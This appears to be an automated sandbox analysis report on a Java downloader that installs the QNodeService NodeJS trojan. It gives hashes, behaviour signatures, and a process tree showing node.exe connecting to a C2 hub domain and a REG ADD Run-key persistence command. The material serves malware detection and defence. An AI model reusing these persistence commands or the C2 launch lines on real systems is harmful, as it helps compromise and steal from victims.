Analysis
max time kernel: 48s
max time network: 131s
platform: windows10_x64
resource: win10v20201028
submitted: 09-11-2020 07:55
Static task: static1
Behavioral task: behavioral1
  Sample: ORGINV687400321566.jar
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: ORGINV687400321566.jar
  Resource: win10v20201028
General
Target: ORGINV687400321566.jar
Size: 94KB
MD5: 85cc374e0d0f090b1fed3b48e837fd76
SHA1: 8b69b98a03683d9cf235d32968ae69b1b7bfffd9
SHA256: 1af7622fc4457af9970c6127789894db5ba5d39667dbf99b51939cba5414ee3b
SHA512: 4ff78e3c8e4ccecb0c9498bf314aa78c606139b4da378913fcaa2834cef97bd54cf941b070a2c71e82d75e6ed5cc766aafe12bebbe8210a3ff00948aec750e94
Malware Config
Signatures
- QNodeService
  Trojan/stealer written in NodeJS and spread via Java downloader.

- Executes dropped EXE (3 IoCs)
  pid  | Process
  1800 | node.exe
  3052 | node.exe
  3968 | node.exe

- Adds Run key to start application (2 TTPs, 2 IoCs)
  description     | ioc | Process
  Key created     | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\0d0cd538-8d32-4c2d-9ef5-cd884aa5658d = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" | reg.exe

- JavaScript code in executable (3 IoCs)
  resource                                     | yara_rule
  behavioral2/files/0x000100000001ab64-173.dat | js
  behavioral2/files/0x000100000001ab64-181.dat | js
  behavioral2/files/0x000100000001ab64-185.dat | js

- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  26   | wtfismyip.com
  27   | wtfismyip.com

- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description       | ioc | Process
  Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | node.exe
  Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | node.exe

- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  pid  | Process  | events
  1800 | node.exe | 4
  3052 | node.exe | 4
  3968 | node.exe | 10

- Suspicious use of WriteProcessMemory (12 IoCs)
  description                         | pid  | Process   | procid_target
  PID 984 wrote to memory of 1840     | 984  | java.exe  | 76
  PID 984 wrote to memory of 1840     | 984  | java.exe  | 76
  PID 1840 wrote to memory of 1800    | 1840 | javaw.exe | 80
  PID 1840 wrote to memory of 1800    | 1840 | javaw.exe | 80
  PID 1800 wrote to memory of 3052    | 1800 | node.exe  | 82
  PID 1800 wrote to memory of 3052    | 1800 | node.exe  | 82
  PID 3052 wrote to memory of 3968    | 3052 | node.exe  | 83
  PID 3052 wrote to memory of 3968    | 3052 | node.exe  | 83
  PID 3968 wrote to memory of 2708    | 3968 | node.exe  | 85
  PID 3968 wrote to memory of 2708    | 3968 | node.exe  | 85
  PID 2708 wrote to memory of 676     | 2708 | cmd.exe   | 86
  PID 2708 wrote to memory of 676     | 2708 | cmd.exe   | 86
Processes (process tree; each entry is a child of the one above it, indentation shows depth)

C:\ProgramData\Oracle\Java\javapath\java.exe (PID 984, depth 1)
  Command line: java -jar C:\Users\Admin\AppData\Local\Temp\ORGINV687400321566.jar
  - Suspicious use of WriteProcessMemory

  C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe (PID 1840, depth 2)
    Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\ef71d7a4.tmp
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\node-v14.12.0-win-x64\node.exe (PID 1800, depth 3)
      Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain osiman.zapto.org
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\node-v14.12.0-win-x64\node.exe (PID 3052, depth 4)
        Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_2L4k6R\boot.js --hub-domain osiman.zapto.org
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory

        C:\Users\Admin\node-v14.12.0-win-x64\node.exe (PID 3968, depth 5)
          Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_2L4k6R\boot.js --hub-domain osiman.zapto.org
          - Executes dropped EXE
          - Checks processor information in registry
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory

          C:\Windows\system32\cmd.exe (PID 2708, depth 6)
            Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "0d0cd538-8d32-4c2d-9ef5-cd884aa5658d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
            - Suspicious use of WriteProcessMemory

            C:\Windows\system32\reg.exe (PID 676, depth 7)
              Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "0d0cd538-8d32-4c2d-9ef5-cd884aa5658d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
              - Adds Run key to start application